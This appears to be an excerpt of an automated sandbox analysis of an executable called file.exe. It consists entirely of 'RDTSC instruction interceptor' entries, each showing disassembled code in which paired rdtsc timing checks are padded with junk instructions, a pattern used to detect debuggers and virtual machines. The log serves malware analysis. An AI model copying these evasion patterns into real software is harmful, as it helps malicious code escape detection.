              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1409DA4 second address: 1409DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BC4E second address: 140BC61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F76D8B79F2Bh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141009C second address: 14100D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76D8DA98CCh 0x00000008 jno 00007F76D8DA98C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jc 00007F76D8DA98D4h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jng 00007F76D8DA98CAh 0x00000021 push edi 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop edi 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14100D7 second address: 14100ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8B79F32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14101A6 second address: 14101AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD30F second address: 13FD32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F76D8B79F30h 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE379 second address: 13FE396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D8DA98D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE396 second address: 13FE3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F76D8B79F31h 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3B3 second address: 13FE3B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3B9 second address: 13FE3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FE3BD second address: 13FE3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF479 second address: 13FF47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF47D second address: 13FF481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414F6A second address: 1414FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F76D8CF8FE8h 0x0000000d jl 00007F76D8CF8FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F76D8CF8FDFh 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414FA6 second address: 1414FBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F76D881F856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jnp 00007F76D881F862h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415170 second address: 1415188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F76D8CF8FDFh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415188 second address: 141518D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14153F0 second address: 1415415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FDDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F76D8CF8FDEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415415 second address: 141541B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141541B second address: 141543A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F76D8CF8FDFh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14156A5 second address: 14156A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14156A9 second address: 14156B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76D8CF8FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14156B9 second address: 14156BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415979 second address: 1415991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F76D8CF8FE2h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415991 second address: 1415997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419EDC second address: 1419EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419EE2 second address: 1419EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419EEB second address: 1419EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jng 00007F76D8CF9006h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419EFB second address: 1419F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D881F868h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419F1E second address: 1419F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E48DE second address: 13CC0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F76D881F85Ah 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F76D881F858h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D1BEBh] 0x0000002d lea eax, dword ptr [ebp+12478685h] 0x00000033 mov edi, dword ptr [ebp+122D29FCh] 0x00000039 call 00007F76D881F85Ah 0x0000003e jmp 00007F76D881F85Ah 0x00000043 pop edx 0x00000044 push eax 0x00000045 jg 00007F76D881F862h 0x0000004b mov dword ptr [esp], eax 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007F76D881F858h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 call dword ptr [ebp+122D1A98h] 0x0000006e jl 00007F76D881F876h 0x00000074 jmp 00007F76D881F85Eh 0x00000079 pushad 0x0000007a pushad 0x0000007b popad 0x0000007c push ebx 0x0000007d pop ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4A1B second address: 13E4A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4A20 second address: 13E4ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D881F85Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c mov dx, B109h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ecx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov edi, dword ptr [ebp+122D2B80h] 0x00000026 mov dword ptr [ebp+124786DDh], esp 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F76D881F858h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 cmp dword ptr [ebp+122D2A84h], 00000000h 0x0000004d jne 00007F76D881F953h 0x00000053 adc di, 04FEh 0x00000058 mov byte ptr [ebp+122D2617h], 00000047h 0x0000005f or dword ptr [ebp+122D2CA5h], ebx 0x00000065 mov di, cx 0x00000068 mov eax, D49AA7D2h 0x0000006d push edi 0x0000006e mov dword ptr [ebp+122D21B5h], edi 0x00000074 pop edi 0x00000075 nop 0x00000076 jmp 00007F76D881F862h 0x0000007b push eax 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4ABD second address: 13E4AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4E32 second address: 13E4E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4E38 second address: 13E4E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F76D8CF8FD6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F34 second address: 13E4F47 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76D881F858h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F47 second address: 13E4F84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f jg 00007F76D8CF8FD6h 0x00000015 jnp 00007F76D8CF8FD6h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f je 00007F76D8CF8FD6h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 jng 00007F76D8CF8FE4h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E4F84 second address: 13E4F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E50E7 second address: 13E50F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E50F8 second address: 13E50FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E51F5 second address: 13E5207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F76D8CF8FD8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5772 second address: 13E5778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5778 second address: 13E5781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A38 second address: 13E5A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A3C second address: 13E5A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F76D8CF8FDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A4A second address: 13E5A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F76D881F856h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A5A second address: 13E5A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A60 second address: 13E5A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D881F867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A84 second address: 13E5A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5A89 second address: 13E5A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76D881F856h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B87 second address: 13E5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B8E second address: 13E5B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F76D881F856h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B98 second address: 13E5B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5B9C second address: 13E5BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F76D881F858h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jnp 00007F76D881F85Ch 0x00000029 lea eax, dword ptr [ebp+12478685h] 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 jmp 00007F76D881F85Ch 0x00000038 pop ebx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5BE8 second address: 13E5C0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D8CF8FDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F76D8CF8FE2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E5C0D second address: 13CCB63 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76D881F858h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F76D881F858h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 call dword ptr [ebp+122D202Ah] 0x0000002d push ebx 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 push esi 0x00000032 pop esi 0x00000033 pop edx 0x00000034 jmp 00007F76D881F860h 0x00000039 pop ebx 0x0000003a jo 00007F76D881F876h 0x00000040 jng 00007F76D881F85Ch 0x00000046 je 00007F76D881F856h 0x0000004c push eax 0x0000004d push edx 0x0000004e ja 00007F76D881F856h 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CCB63 second address: 13CCB69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419004 second address: 141902D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F76D881F85Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F76D881F85Ah 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141902D second address: 1419033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419033 second address: 141903D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192E6 second address: 14192EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192EE second address: 14192F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14192F4 second address: 141930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F76D8CF8FE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194B8 second address: 14194BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14194BC second address: 14194C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141963A second address: 141963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141963F second address: 1419661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F76D8CF8FD6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419661 second address: 1419665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419665 second address: 1419671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1419A84 second address: 1419AB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e js 00007F76D881F858h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F76D881F866h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141CABD second address: 141CAEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8CF8FE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D8CF8FDBh 0x0000000e jnp 00007F76D8CF8FD6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421556 second address: 1421568 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F76D881F856h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421568 second address: 142156E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142156E second address: 142158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D881F869h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142158B second address: 142158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420A8A second address: 1420AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D881F861h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F76D881F863h 0x00000011 push esi 0x00000012 jmp 00007F76D881F85Eh 0x00000017 pop esi 0x00000018 popad 0x00000019 pushad 0x0000001a push edi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420AD2 second address: 1420ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421875 second address: 142187A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142187A second address: 142189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8CF8FE0h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F76D8CF8FDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142189B second address: 14218A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1421B51 second address: 1421B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263F4 second address: 14263F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14263F8 second address: 14263FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
